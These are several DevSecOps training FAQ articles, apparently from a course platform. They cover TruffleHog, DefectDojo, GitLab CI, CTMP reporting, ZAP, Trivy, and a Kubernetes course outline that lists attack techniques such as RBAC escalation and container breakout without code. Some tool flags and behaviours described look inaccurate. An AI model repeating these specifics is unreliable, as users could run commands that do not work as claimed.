- Does TruffleHog scan every branch automatically, or only a specific one?

This article answers those questions step by step, provides ready‑to‑copy command examples, and offers tips for scanning private repositories and limiting the scope of a scan.

1. Understanding file:/// and the Mounted /src Directory

1.1 What file:/// Means

file:/// is a URI scheme that tells TruffleHog to treat the following path as a local filesystem location, not a remote Git URL. When you run:

```shell
docker run --rm -v $(pwd):/src \
  hysnsec/trufflehog \
  --repo_path /src file:///src \
  --json > trufflehog-output.json
```

the file:///src part resolves to /src inside the Docker container.

1.2 How the Host Directory Becomes /src

- $(pwd) – the current working directory on the GitLab Runner (or your local machine).
- -v $(pwd):/src – Docker’s volume flag that bind‑mounts the host directory into the container at the path /src.

Result: everything you see in your host’s $(pwd) is available to the container at /src. TruffleHog will therefore scan the exact same files that exist on the host.
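The file:///src URI can be decomposed with any standard URI parser. This quick Python check (independent of TruffleHog itself) confirms that the scheme is `file` and the path is the container‑side `/src`, not a host path:

```python
from urllib.parse import urlparse

# Parse the URI exactly as passed to TruffleHog in the docker run command.
uri = urlparse("file:///src")

print(uri.scheme)  # file   -> "treat this as a local filesystem location"
print(uri.path)    # /src   -> the mount point inside the container
```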
1.3 Quick Visual

```
Host (GitLab Runner)              Container
--------------------              ---------
/home/gitlab-runner/project  <--  /src (mounted via -v)
```

When TruffleHog receives file:///src, it walks the /src directory inside the container, which mirrors the host project directory.

2. The --repo_path Flag – Why It Works Even If Not Listed

2.1 Where the Flag Comes From

The official TruffleHog binary supports a --repo_path option, but the Docker image’s entrypoint script often wraps the binary and exposes a simplified CLI. The --help output you see when you run docker run hysnsec/trufflehog --help shows only the top‑level commands, not every underlying flag. The image still forwards --repo_path to the binary, so it works.

2.2 What --repo_path Does

- --repo_path <path> tells TruffleHog to treat <path> as the root of the repository to scan.
- It is required when you are scanning a local checkout (as opposed to a remote Git URL).

2.3 Can You Use a Git URL Instead?

Yes. If you have a public repository, you can replace the file:/// syntax with a standard Git URL:

```shell
docker run --rm hysnsec/trufflehog \
  --repo_path /tmp \
  https://github.com/example/public-repo.git \
  --json > trufflehog-output.json
```

For private repositories you must provide authentication (SSH keys, personal access tokens, or --username/--password flags). The simple file:/// approach avoids authentication because it scans a local copy that you already have access to.

3. Branch Scanning – All Branches vs. Specific Branch

3.1 Default Behavior

By default, TruffleHog walks the entire commit history of every branch in the repository. This includes:

- master / main
- Feature branches
- Remote tracking branches (if they exist locally)

3.2 Scanning a Single Branch

If you only care about a particular branch, use the --branch flag:

```shell
docker run --rm -v $(pwd):/src hysnsec/trufflehog \
  --repo_path /src \
  file:///src \
  --branch develop \
  --json > trufflehog-output.json
```

Only the develop branch’s history will be examined.

3.3 Practical Test
1. Create a secret on a new branch:

   ```shell
   git checkout -b secret-branch
   echo "API_KEY=abcd1234" > .env
   git add .env && git commit -m "Add secret"
   git push origin secret-branch
   ```

2. Run TruffleHog without --branch – you’ll see the secret reported.
3. Run TruffleHog with --branch main – the secret is ignored because it lives only on secret-branch.

4. Scanning Private Repositories

- TruffleHog can scan private repos only when you provide credentials.
- Common approaches:

| Method | How to Use |
|--------|------------|
| SSH key | Mount ~/.ssh into the container (-v $HOME/.ssh:/root/.ssh) and ensure the key has access to the repo. |
| HTTPS token | Pass the token via --username and --password flags, or set the GIT_ASKPASS environment variable. |
| Git credential helper | Mount your host’s .git-credentials file. |

If you cannot expose credentials, clone the repository on the host first, then scan the local copy with file:///.

5. Full Example: Scanning a Local Repo in GitLab CI

```yaml
# .gitlab-ci.yml
trufflehog_scan:
  image: hysnsec/trufflehog:latest
  stage: test
  script:
    - |
      docker run --rm \
        -v $(pwd):/src \
        hysnsec/trufflehog \
        --repo_path /src \
        file:///src \
        --branch main \
        --json > trufflehog-output.json
    - cat trufflehog-output.json
  # optional: upload as artifact
  artifacts:
    paths:
      - trufflehog-output.json
    expire_in: 1 week
```

The job mounts the repository, scans only the main branch, and stores the JSON report as a CI artifact.

Common Questions & Tips

| Question | Answer |
|----------|--------|
| Do I need --repo_path when scanning a remote URL? | No. For remote URLs you can omit --repo_path and just pass the URL (e.g., https://github.com/...). |
| Can TruffleHog scan non‑Git filesystems? | Yes. Using file:/// lets you scan any directory, even if it isn’t a Git repo. |
| How to limit the scan to recent commits? | Use --max_depth <n> to stop after n commits, or --since_commit <commit> to start from a specific commit. |
| Why is my scan slow? | Large histories or many branches increase runtime. Restrict with --branch or --max_depth. |
| What output formats are available? | --json for machine‑readable output, or the default plain‑text console output. Choose the one that fits your downstream tooling. |

Tip: Always run TruffleHog on a local copy of a private repository to avoid leaking credentials in CI logs.

Conclusion

Understanding how file:/// interacts with Docker volume mounts, why the --repo_path flag works, and how to control branch scanning empowers you to integrate TruffleHog confidently into DevSecOps pipelines. Whether you’re scanning public open‑source projects or private codebases, the patterns shown here will help you get reliable secret‑detection results without unnecessary complexity. Happy hunting!
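Once you have trufflehog-output.json, a short script can turn the raw findings into a per‑file summary for triage. This sketch assumes a JSON‑lines report where each finding carries `path` and `reason` fields (treat the exact key names as an assumption and adjust them to match your actual report):

```python
import json
from collections import Counter

def summarize(report_lines):
    """Count findings per file path from a JSON-lines secrets report."""
    counts = Counter()
    for line in report_lines:
        line = line.strip()
        if not line:
            continue
        finding = json.loads(line)
        counts[finding.get("path", "<unknown>")] += 1
    return counts

# Synthetic sample in the assumed one-object-per-line format:
sample = [
    '{"path": ".env", "reason": "High Entropy", "branch": "secret-branch"}',
    '{"path": ".env", "reason": "Generic API key", "branch": "secret-branch"}',
    '{"path": "config.py", "reason": "High Entropy", "branch": "main"}',
]

for path, n in summarize(sample).most_common():
    print(f"{path}: {n} finding(s)")
```

In CI you would feed it the report file instead of the inline sample, e.g. `summarize(open("trufflehog-output.json"))`.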

Last updated on Jan 07, 2026

CDP Pipeline Failures & Best Practices for DefectDojo Integration

CDP Pipeline Failures & Best Practices for DefectDojo Integration

When working with the pipelines, you’ll often encounter jobs that are expected to “fail” when they detect security issues. Understanding why certain jobs can be allowed to fail—and how to handle scan results in DefectDojo—helps you keep your pipeline efficient, your reports clean, and your compliance posture strong. This article walks through the rationale behind permissive‑failure settings for specific CDP jobs and offers guidance on what scan data should be sent to DefectDojo.

Table of Contents

1. Why Some Jobs May Be Allowed to Fail
2. Configuring “Allow Failure” for Specific Jobs
3. DefectDojo Integration: What to Send and What to Exclude
4. Practical Example: End‑to‑End Pipeline Setup
5. Tips & Common Questions

Why Some Jobs May Be Allowed to Fail

1. Jobs Designed to Surface Vulnerabilities

- sast-with-vm – Runs static application security testing (SAST) inside a virtual machine. A failure indicates that the scanner discovered one or more code‑level vulnerabilities.
- sca-frontend – Executes software component analysis (SCA) on front‑end dependencies. A failing status means vulnerable libraries were found.

These jobs are intentional gatekeepers. Treating a failure as a hard pipeline break would stop the build even when the only issue is a newly discovered vulnerability that you may want to triage first.

2. Jobs That Should Remain Strict

- sslscan – Checks TLS configurations. A failure usually points to misconfigurations that could expose data in transit.
- ansible-hardening & inspec – Enforce hardening standards and compliance checks. Failures here often indicate non‑compliant infrastructure that must be remediated before proceeding.

Bottom line: Only allow failure on jobs whose primary purpose is to report findings, not to enforce mandatory compliance.

Configuring “Allow Failure” for Specific Jobs

1. Open the .gitlab-ci.yml (or equivalent) file in your repository.
2. Locate the job definitions for sast-with-vm and sca-frontend.
3. Add the allow_failure: true flag:

   ```yaml
   sast-with-vm:
     stage: test
     script:
       - ./run-sast.sh
     allow_failure: true  # <-- permits the job to fail without breaking the pipeline

   sca-frontend:
     stage: test
     script:
       - ./run-sca.sh
     allow_failure: true  # <-- same rationale as above
   ```

4. Commit and push the changes. The pipeline will now continue even if these jobs report vulnerabilities, while still publishing the findings for review.

Note: Keep allow_failure off for jobs like sslscan, ansible-hardening, and inspec to ensure that critical security misconfigurations halt the pipeline.

DefectDojo Integration: What to Send and What to Exclude

DefectDojo is a powerful vulnerability management platform, but it expects certain formats and scan types. Sending only relevant results avoids clutter and improves triage speed.

What to Send

| Scan Type | Reason for Inclusion |
|-----------|----------------------|
| SAST results (sast-with-vm) | Provides line‑level code defects that developers can fix directly. |
| SCA results (sca-frontend) | Highlights vulnerable third‑party libraries; essential for dependency management. |
| Custom security scans (e.g., OWASP ZAP, Burp) | Adds dynamic testing data that complements static findings. |

What to Exclude

| Scan Type | Reason for Exclusion |
|-----------|----------------------|
| ansible-hardening | Generates configuration‑hardening reports that DefectDojo does not natively parse. |
| inspec | Produces compliance check output (e.g., CIS benchmarks) which is better stored in a compliance dashboard rather than a vulnerability tracker. |
| Non‑security artifacts (e.g., build logs, test coverage) | Irrelevant to vulnerability management and increase storage costs. |

How to Push Findings to DefectDojo

1. Export the scan results in a supported format (e.g., SARIF, JUnit XML, JSON).
2. Use the DefectDojo API or the built‑in CI integration:

   ```shell
   curl -X POST "https://defectdojo.example.com/api/v2/import-scan/" \
     -H "Authorization: Token <YOUR_API_TOKEN>" \
     -F "scan_type=SAST" \
     -F "file=@sast-results.sarif" \
     -F "engagement=123" \
     -F "product_name=MyApp"
   ```

3. Verify the import in the DefectDojo UI and assign findings to the appropriate remediation sprint.

Practical Example: End‑to‑End Pipeline Setup

Below is a simplified snippet that ties everything together:

```yaml
stages:
  - test
  - report
  - upload

sast-with-vm:
  stage: test
  script: ./run-sast.sh
  allow_failure: true
  artifacts:
    paths: [sast-results.sarif]

sca-frontend:
  stage: test
  script: ./run-sca.sh
  allow_failure: true
  artifacts:
    paths: [sca-results.json]

sslscan:
  stage: test
  script: ./run-sslscan.sh
  # No allow_failure – must pass

defectdojo-upload:
  stage: upload
  script:
    - ./upload-to-defectdojo.sh sast-results.sarif SAST
    - ./upload-to-defectdojo.sh sca-results.json SCA
  dependencies: [sast-with-vm, sca-frontend]
  only:
    - main
```

- allow_failure: true ensures the pipeline proceeds even when vulnerabilities are found.
- The final defectdojo-upload job sends only the relevant scans to DefectDojo.

Tips & Common Questions

✅ Tips for a Smooth Integration

- Standardize output formats across all security tools (prefer SARIF or JSON).
- Tag each upload with the pipeline ID or commit SHA to maintain traceability.
- Run a dry‑run of the DefectDojo import script locally before committing to CI.

❓ Common Questions

| Question | Answer |
|----------|--------|
| Can I allow failure for sslscan? | Not recommended. TLS misconfigurations should block the pipeline until fixed. |
| What if DefectDojo rejects a scan? | Check the API response; most rejections are due to unsupported file types or missing required fields. |
| Should I send duplicate findings from multiple scans? | No. Consolidate duplicates in DefectDojo to avoid “noise” and ensure accurate metrics. |
| How do I handle false positives? | Mark them as “false positive” in DefectDojo; this status is respected in future imports. |

Bottom Line

Allowing failure for sast-with-vm and sca-frontend is intentional—these jobs are meant to surface vulnerabilities without halting the build. Conversely, keep strict enforcement on compliance‑oriented jobs. When integrating with DefectDojo, send only the scans it can parse (SAST, SCA, dynamic tests) and omit hardening or compliance outputs. Following these practices will keep your CDP pipelines lean, your security reporting accurate, and your remediation workflow efficient.
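The curl call above can also be driven from a script. The sketch below only assembles the form fields so they can be validated before anything is sent; the field names mirror the curl example, the values are placeholders, and the report file itself would be attached separately as a multipart upload by whatever HTTP client you use:

```python
def build_import_scan_fields(scan_type: str, engagement_id: int, product_name: str) -> dict:
    """Assemble the non-file form fields for DefectDojo's /api/v2/import-scan/ endpoint.

    The scan report (e.g. sast-results.sarif) is attached separately as the
    multipart "file" part by the HTTP client.
    """
    return {
        "scan_type": scan_type,            # e.g. "SAST", matching the curl example
        "engagement": str(engagement_id),  # DefectDojo engagement ID (placeholder: 123)
        "product_name": product_name,      # placeholder: "MyApp"
    }

fields = build_import_scan_fields("SAST", 123, "MyApp")
print(fields["scan_type"])  # SAST
```

Validating the fields locally (a "dry run" of the import, as recommended in the tips above) catches missing required values before they show up as API rejections in CI.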

Last updated on Jan 06, 2026

GitLab CI/CD: Repository Location, Predefined Variables, Tool Images, and Common Configuration Questions

GitLab CI/CD: Repository Location, Predefined Variables, Tool Images, and Common Configuration Questions

Introduction

When you start building DevSecOps pipelines in GitLab, you quickly encounter questions about where code lives, which environment variables you can rely on, and how to choose the right Docker image for security tools such as npm audit or Retire.js. This article consolidates the most frequently asked questions from the GitLab CI/CD labs and provides clear, actionable answers. By the end of the guide you will know:

- Where the repository is cloned during a pipeline run.
- Which predefined variables are available out‑of‑the‑box.
- How to pick an optimal Docker image for Node‑based security scans.
- Why Retire.js may still report low/medium findings when you limit severity.
- How to safely run InSpec compliance checks against a production server from a CI/CD job.

1. Where Does the Repository Reside During a Pipeline?

1.1 The Source Repository

- GitLab hosts the canonical source code repository. All branches, tags, and merge requests live here.

1.2 The Runner’s Workspace

- When a pipeline is triggered, GitLab Runner automatically clones the repository into a temporary working directory on the runner machine.
- Because the code is already present, you do not need to add an explicit git clone step in your .gitlab-ci.yml.
- After the job finishes, the runner discards the workspace, ensuring a clean environment for the next job.

Tip: If you need to keep a copy of the repository for debugging, enable the artifacts keyword to archive the workspace after the job completes.

2. Predefined CI/CD Variables in GitLab

GitLab injects a rich set of environment variables into every job. They are read‑only and can be referenced directly in your scripts or YAML configuration.
| Variable | Description | Example Use |
|----------|-------------|-------------|
| CI_PIPELINE_ID | Unique identifier of the current pipeline | echo "Pipeline #$CI_PIPELINE_ID" |
| CI_COMMIT_REF_NAME | Branch or tag name that triggered the pipeline | docker build -t myapp:$CI_COMMIT_REF_NAME . |
| CI_COMMIT_SHA | Full 40‑character commit hash | git checkout $CI_COMMIT_SHA |
| CI_PROJECT_NAME | Human‑readable project name | echo "Deploying $CI_PROJECT_NAME" |
| CI_RUNNER_DESCRIPTION | Text description of the runner | echo "Running on $CI_RUNNER_DESCRIPTION" |
| CI_RUNNER_TAGS | Comma‑separated list of runner tags | echo "Runner tags: $CI_RUNNER_TAGS" |
| CI_JOB_ID | Unique identifier for the current job | curl -X POST -d "job=$CI_JOB_ID" https://example.com |
| CI_JOB_NAME | Name defined in the job: block of .gitlab-ci.yml | echo "Job: $CI_JOB_NAME" |
| CI_JOB_STAGE | Pipeline stage (e.g., build, test, deploy) | if [ "$CI_JOB_STAGE" = "deploy" ]; then …; fi |
| CI_REGISTRY | URL of the project's container registry | docker login $CI_REGISTRY -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD |

Note: A full list of predefined variables is available in the official GitLab docs under CI/CD predefined variables.

3. Choosing the Right Docker Image for NPM Audit

3.1 Why the Image Matters

Security tools need the same runtime as your application to produce accurate results. Selecting an image that mirrors your production environment reduces false positives and eliminates version mismatches.

3.2 Recommended Base Image

```yaml
image: node:18  # Replace 18 with the exact major version you use
```

- node:<major> – Guarantees the Node.js version matches the one declared in your package.json.
- node:latest – Useful for quick prototypes but can introduce breaking changes when the upstream image updates.
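One lightweight way to catch an image/version mismatch early is to compare the image's Node major version against the `engines` field of package.json. A hedged sketch (the `engines` value and the parsing here are simplified assumptions; real semver ranges can be more complex):

```python
import json
import re

def required_node_major(package_json: str):
    """Extract the major Node version from package.json's engines.node field.

    Returns None when no engines.node constraint is declared.
    """
    engines = json.loads(package_json).get("engines", {})
    spec = engines.get("node", "")
    match = re.search(r"(\d+)", spec)  # first number in e.g. ">=18.0.0"
    return int(match.group(1)) if match else None

pkg = '{"name": "myapp", "engines": {"node": ">=18.0.0"}}'
print(required_node_major(pkg))  # 18 -> pick image: node:18
```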
3.3 Extending the Image (Optional)

If you need additional tools (e.g., jq, curl), create a custom image:

```
FROM node:18
RUN apt-get update && apt-get install -y jq curl
```

Then reference it in the pipeline:

```yaml
image: registry.example.com/custom-node-audit:latest
```

3.4 Sample NPM Audit Job

```yaml
npm_audit:
  stage: test
  script:
    - npm ci  # Install exact dependencies
    - npm audit --json > audit-report.json
    - cat audit-report.json | jq .
  artifacts:
    paths:
      - audit-report.json
```

4. Why Retire.js Still Shows Low & Medium Findings When Using --severity high

- Retire.js evaluates vulnerabilities based on its internal database. The --severity flag only influences the exit code (i.e., whether the job fails) – it does not filter the output.
- Consequently, the console will still list every finding, but the job will exit with a non‑zero status only if a vulnerability meets the specified severity threshold.

How to Suppress Lower‑Severity Output

```shell
retire --severity high --output json | jq 'select(.severity=="high")'
```

Or use the --ignore option to exclude specific files or components from the scan.

5. Running InSpec Compliance Checks Against Production

5.1 What Happens When You Store a Private SSH Key in CI/CD

1. The private key is added to the runner’s protected variables (e.g., PROD_SSH_KEY).
2. During the job, the key is written to a temporary file and used to open an SSH session to the target host.

5.2 The Role of DEPLOYMENT_SERVER

- The variable DEPLOYMENT_SERVER holds the hostname or IP address of the production machine you want to test.
- The InSpec command typically looks like:

```yaml
inspec_test:
  stage: compliance
  script:
    - echo "$PROD_SSH_KEY" > /tmp/id_rsa
    - chmod 600 /tmp/id_rsa
    - inspec exec controls/ --target ssh://$DEPLOYMENT_SERVER --key-files /tmp/id_rsa
```

5.3 Security Best Practices

| Recommendation | Reason |
|----------------|--------|
| Use protected CI/CD variables for private keys. | Limits exposure to protected branches only. |
| Restrict the runner’s network access to the production subnet. | Prevents accidental lateral movement. |
| Rotate SSH keys regularly and audit their usage. | Reduces risk of credential leakage. |
| Prefer temporary, one‑time keys generated via a bastion host. | Limits the blast radius if a key is compromised. |

Common Questions & Tips

Q1: Do I need to git clone inside a job?
A: No. GitLab Runner automatically clones the repository into the job’s workspace.

Q2: Can I override a predefined variable?
A: Yes, but only within the scope of a job using the variables: keyword. Overriding a predefined variable may lead to unexpected behavior, so use it sparingly.

Q3: How do I debug a failing pipeline that uses a custom Docker image?
A: Add a script: step with env and cat /etc/os-release to inspect the environment, or use the docker run -it command locally to reproduce the container.

Q4: What if my pipeline needs both Node.js and Python?
A: Create a multi‑stage image that installs both runtimes, or use separate jobs with different images and share artifacts between them.

Conclusion

Understanding where your code lives, leveraging GitLab’s predefined variables, and selecting the right Docker image are foundational steps for building reliable DevSecOps pipelines. By following the guidelines above, you can integrate tools like npm audit, Retire.js, and InSpec with confidence, while maintaining security best practices for production testing. Happy automating!
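To act on the audit-report.json produced by the npm audit job above — for example, gating the pipeline only on high/critical issues — a short script can read the summary counts. This assumes the `metadata.vulnerabilities` layout that recent npm versions emit; treat the exact keys as an assumption and verify them against your own report:

```python
import json

def severe_count(report_text: str) -> int:
    """Return the number of high + critical findings from an npm audit JSON report."""
    counts = json.loads(report_text).get("metadata", {}).get("vulnerabilities", {})
    return counts.get("high", 0) + counts.get("critical", 0)

# Synthetic report in the assumed shape:
report = '{"metadata": {"vulnerabilities": {"info": 0, "low": 2, "moderate": 1, "high": 1, "critical": 0}}}'

count = severe_count(report)
print(count)  # 1
exit_code = 1 if count else 0  # mirror a CI gate: fail only on severe findings
```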

Last updated on Jan 07, 2026

CTMP Tools and Reporting Guidelines – What You Need to Know for the Certified Threat Modeling Professional Exam

CTMP Tools and Reporting Guidelines – What You Need to Know for the Certified Threat Modeling Professional Exam Introduction Preparing for the Certified Threat Modeling Professional (CTMP) exam involves more than mastering theory—you also need to know which tools are available in the course and how to assemble a clear, compliant exam report. This article walks you through the dashboard‑style tools you’ll encounter, outlines the exact components required in your exam submission, and offers practical tips to help you present your work professionally. Whether you’re a first‑time candidate or refreshing your knowledge, these guidelines will keep you on track and boost your confidence on exam day. 1. Dashboard‑Based Tools Included in the CTMP Course The CTMP curriculum introduces several threat‑modeling utilities that you can use during labs and the exam. The most prominent ones are: | Tool | Primary Use | Key Features | |------|--------------|--------------| | ThreatDragon | Open‑source threat‑modeling editor | Drag‑and‑drop data flow diagrams (DFDs), automatic STRIDE analysis, export to PDF/PNG, integration with GitHub | | ThreatModelling (the course‑specific web app) | Guided threat‑model creation | Step‑by‑step wizard, built‑in reporting templates, collaborative workspace | | Additional utilities (e.g., Microsoft Threat Modeling Tool, OWASP Threat Dragon, PlantUML) | Optional, for advanced diagramming or automation | Custom script support, API access, extensive library of symbols | Tip: While ThreatDragon is the default recommendation, you are free to use any compatible tool that produces the required diagrams and documentation. The important factor is that the output is clear, accurate, and can be embedded in your final report. 2. What the CTMP Exam Report Must Contain Your exam submission is evaluated on both content completeness and presentation quality. The following three sections are mandatory: 1. 
List of Exam Challenges - Enumerate each challenge exactly as it appears in the exam interface. - Use a numbered list (e.g., Challenge 1, Challenge 2, …) for easy reference. 2. Process Explanation - Describe, in your own words, how you approached each challenge. - Include the methodology, threat‑modeling technique (e.g., STRIDE, DREAD), and any decision‑making criteria. - Keep explanations concise (150‑250 words per challenge) but thorough enough to demonstrate your reasoning. 3. Evidence of Completion - Attach screenshots, log excerpts, or output files that prove you solved the challenge. - Highlight key steps (e.g., a highlighted portion of a DFD or a screenshot of a generated risk matrix). - Ensure all images are legible (minimum 300 dpi) and labeled with the corresponding challenge number. 4. 3. Incorporating Diagrams, Tables, and Other Visuals While the core report structure is fixed, you have flexibility in how you present supporting material: 3.1 Using Diagrams - Create diagrams in ThreatDragon or your preferred tool and export them as PNG or PDF. - Insert each diagram directly below the relevant challenge description. - Add a caption that includes the challenge number and a brief title (e.g., “Figure 1 – DFD for Challenge 2: Online Payment Flow”). 3.2 Adding Tables - Tables are ideal for summarizing risk scores, mitigation actions, or asset inventories. - Use Markdown table syntax in the report or embed an Excel/CSV screenshot if the platform does not support native tables. 3.3 Other Artifacts - Code snippets (e.g., a security‑control script) can be formatted using fenced code blocks. - Video clips are not accepted, but you can provide a link to a private repository (e.g., a GitHub Gist) if the exam rules permit external references. 4. Practical Example: Formatting a Single Challenge Below is a concise template you can copy for every challenge in your exam report: ### Challenge 1 – Identify Threats in the User Authentication Flow **Process Overview** 1. 
Imported the system architecture into ThreatDragon. 2. Applied STRIDE analysis to each data flow. 3. Prioritized threats using the DREAD scoring model. **Key Findings** | Threat | STRIDE Category | DREAD Score | Recommended Mitigation | |--------|----------------|------------|------------------------| | Credential stuffing | Spoofing | 8 | Implement CAPTCHA and rate limiting | | Session hijacking | Tampering | 7 | Enforce secure, HttpOnly cookies | **Evidence** - ![DFD for Challenge 1](./images/challenge1-dfd.png) - *Figure 1 – Data Flow Diagram highlighting the authentication endpoints.* - Screenshot of the DREAD score matrix (see Appendix A). Repeating this pattern for each challenge guarantees consistency and makes it easy for reviewers to locate information. 5. Tips for a Polished, Exam‑Ready Report - Consistent Naming: Use the same challenge numbers throughout the document, diagrams, and file names. - File Size Management: Compress images without losing readability; keep the total PDF under the platform’s size limit (usually 25 MB). - Proofread: Spelling or grammatical errors can distract reviewers from the technical content. - Version Control: Save a copy of your report before final submission; you may need to revert if a file becomes corrupted. 6. Common Questions | Question | Answer | |----------|--------| | Do I have to use ThreatDragon for the exam? | No. Any tool that can produce clear DFDs, tables, or risk matrices is acceptable, as long as the output is included in the final report. | | Can I submit a separate document for diagrams? | All supporting artifacts must be embedded in the single exam report file (PDF or DOCX) unless the exam instructions explicitly allow separate attachments. | | What if a screenshot is blurry? | Re‑capture the screen at a higher resolution or annotate the critical area. Illegible evidence may be marked as insufficient. | | Are third‑party libraries allowed in the diagrams? 
| Yes, you may import symbols from external libraries (e.g., Visio stencils) as long as they accurately represent the system components. | Conclusion Mastering the CTMP exam isn’t just about threat‑modeling knowledge—it also hinges on delivering a well‑structured, evidence‑rich report. By leveraging the built‑in tools like ThreatDragon, adhering to the three‑section report format, and polishing your visuals, you’ll present a professional submission that showcases both your analytical skills and attention to detail. Follow the guidelines above, double‑check every requirement, and you’ll be ready to earn your Certified Threat Modeling Professional credential with confidence.
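One of the tips above — keeping the total report under the platform's size limit (usually 25 MB) — can be checked from a terminal before you upload. This is our own illustrative sketch, not part of the exam tooling; `report.pdf` is a placeholder file name:

```shell
# Check the final report against the typical 25 MB platform limit.
# "report.pdf" is a placeholder; substitute your actual report file.
LIMIT=$((25 * 1024 * 1024))                        # 25 MB in bytes
SIZE=$({ wc -c < report.pdf; } 2>/dev/null || echo 0)
if [ "$SIZE" -gt "$LIMIT" ]; then
  echo "Too large ($SIZE bytes): compress images before submitting"
else
  echo "OK: $SIZE bytes"
fi
```

If the report is over the limit, re-export images at a lower (but still legible) resolution and re-check.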

Last updated on Jan 06, 2026

Security Testing Tools: Common Errors, What to Expect, and Course Scope Overview

Security Testing Tools: Common Errors, What to Expect, and Course Scope Overview In DevSecOps training, learners often encounter confusing results or error messages while working with tools such as OWASP ZAP, Trivy, and the Kubernetes security labs. Understanding why these issues occur, how to troubleshoot them, and what each certification course actually covers can save you hours of frustration and keep your learning path on track. This article walks through four frequently‑asked questions, explains the underlying concepts, and offers practical tips you can apply immediately in the lab environment. 1. Why Does the ZAP AJAX Spider Return No Results? The core reason The AJAX spider in OWASP ZAP is designed to discover URLs that are loaded dynamically via JavaScript. However, unlike a full browser, the spider does not execute every piece of JavaScript by default, which means: 1. Dynamic URLs hidden behind complex scripts may never be requested. 2. Single‑page applications (SPAs) that build routes on‑the‑fly can appear invisible to the spider. 3. Conditional rendering (e.g., URLs only shown after a user interaction) is missed unless explicitly triggered. How to verify and improve coverage | Step | Action | Why it helps | |------|--------|--------------| | 1. Enable “Run in Browser” mode | In ZAP → Tools → Options → AJAX Spider, tick “Run in a real browser (e.g., Chrome)” | A real browser executes JavaScript, exposing hidden endpoints. | | 2. Add manual interactions | Use the Manual Request tab to fire events (clicks, form submissions) that you suspect generate URLs. | Triggers event‑driven routes that the spider cannot guess. | | 3. Increase crawl depth | Set a higher Maximum Crawl Depth in the spider settings. | Allows the spider to follow longer chains of redirects and API calls. | | 4. Combine with a traditional spider | Run the classic ZAP spider first, then the AJAX spider. | The classic spider finds static links; the AJAX spider fills in the dynamic gaps. | | 5. 
Review console logs | Open the ZAP console (View → Console) and look for JavaScript errors. | Errors may indicate why certain scripts never executed. | Quick scenario You are testing a React‑based dashboard that loads data after a user clicks “View Reports.” The AJAX spider finishes with 0 URLs found. By launching the spider in Chrome and manually clicking the “View Reports” button in the browser window that ZAP opens, you’ll see several new API calls appear in the Sites tree – those were the missing URLs. 2. How Do Pentesters Gather Initial Clues for Exploitation? Information gathering (often called recon) is the foundation of any successful penetration test. The process can be broken down into three practical stages: 1. Crawl & Map the Application - Use tools (ZAP, Burp Suite, Nmap, or simple wget/curl) to enumerate every reachable URL. - Record HTTP methods, response codes, and any redirects. 2. Identify Input Vectors - Locate form fields, query parameters, JSON bodies, and JavaScript events that accept user data. - Note data types (e.g., numeric, string, file upload) and any client‑side validation. 3. Probe for Vulnerabilities - Apply automated scanners (OWASP ZAP, Nikto, or custom scripts) to each input point. - Follow up with manual testing for high‑risk issues such as SQL injection, XSS, insecure deserialization, and broken authentication. Example workflow 1️⃣ Run ZAP spider → Export sitemap → 150 endpoints identified 2️⃣ Filter for parameters → 42 distinct query strings 3️⃣ Run ZAP active scan on those 42 → 7 potential issues flagged 4️⃣ Manually verify each finding → Confirm 3 true positives (SQLi, XSS, SSRF) Tips for effective recon - Document everything – a simple spreadsheet with columns for URL, Method, Parameters, Findings keeps the data searchable. - Leverage open‑source intel – GitHub, Shodan, and public API docs often reveal hidden endpoints. 
- Prioritize high‑value assets – focus on admin panels, authentication endpoints, and data‑exfiltration routes first. 3. “Kubernetes Image Scanning Using Trivy” Lab Returns an Error – What to Do? Typical cause The most common reason you see an error during the Trivy lab is that the underlying virtual machine or container environment was not provisioned correctly. This can happen when: - The lab VM fails to start due to insufficient cloud resources. - Required Docker images are missing or corrupted. - Network policies block access to the container registry. Immediate troubleshooting checklist 1. Confirm VM status – In the learning portal, verify the VM shows Running and note the IP address. 2. SSH into the instance ssh learner@<lab‑ip> If you cannot connect, the provisioning step likely failed; request a new lab instance. 3. Validate Docker & Trivy installation docker version trivy --version Errors here indicate a broken environment. 4. Run a simple scan to test connectivity trivy image alpine:latest Successful output proves Trivy works; if not, check internet access (curl https://registry-1.docker.io/v2/). When to request support - The VM never reaches Running after 10 minutes. - Docker daemon fails to start (systemctl status docker). - Trivy returns “unable to download vulnerability database” repeatedly. Provide the support team with the lab ID, timestamp, and any console logs you captured. This information speeds up resolution. 4. Does the CCSE Certification Include Attacking a Kubernetes Cluster? Yes. The Certified Cloud Security Engineer (CCSE) curriculum (also referred to as CCNSE in some training tracks) explicitly covers offensive techniques against a Kubernetes environment. Topics include: - Cluster enumeration – discovering nodes, pods, and services via the Kubernetes API. - Privilege escalation – exploiting misconfigured RBAC, service accounts, and hostPath volumes. 
- Pod‑to‑pod network attacks – leveraging Kubernetes network policies and service mesh weaknesses. - Supply‑chain compromise – tampering with container images and Helm charts. What you’ll practice in the lab | Lab Exercise | Key Skill | |--------------|-----------| | Kubelet API abuse | Accessing the kubelet’s read‑only port to extract pod logs and secrets. | | RBAC misconfiguration exploitation | Using a low‑privilege service account to gain cluster‑admin rights. | | Privileged container breakout | Escaping from a container to the host node via hostPath mounts. | | Image scanning & remediation | Running Trivy against images, fixing CVEs, and re‑deploying securely. | If you’re preparing for the exam, focus on hands‑on practice with kubectl, helm, and security‑focused tools (Trivy, kube-hunter, kube-bench). Understanding both the defensive controls and the offensive attack paths is essential for success. Common Questions & Quick Tips Q1: “My ZAP AJAX spider still shows 0 URLs even after enabling the browser.” Tip: Verify that the target site does not require authentication. If it does, configure ZAP’s Session Management to handle login before spidering. Q2: “How many times should I run Trivy on the same image?” Tip: Run Trivy once after building the image and again after each dependency update. Automate this with a CI pipeline to catch regressions early. Q3: “Can I use the same recon techniques for mobile apps?” Tip: Yes—replace the web spider with tools like MobSF or Frida, but still follow the three‑stage approach: map, identify inputs, probe. Q4: “Do I need a separate lab for Kubernetes attacks?” Tip: The CCSE labs are self‑contained; however, you can spin up a local Kind or Minikube cluster to experiment further without affecting the hosted environment. Bottom Line - AJAX spidering is powerful but limited; augment it with a real browser and manual interaction. - Pentest recon follows a systematic crawl → input discovery → vulnerability probing workflow. 
- Trivy image‑scanning errors usually stem from a mis‑provisioned lab; verify VM health before troubleshooting. - CCSE/CCNSE fully embraces Kubernetes offensive testing, so expect hands‑on labs that mirror real‑world cloud attacks. Armed with these insights, you can navigate the labs more confidently, resolve common roadblocks quickly, and deepen your mastery of DevSecOps security testing. Happy hacking!
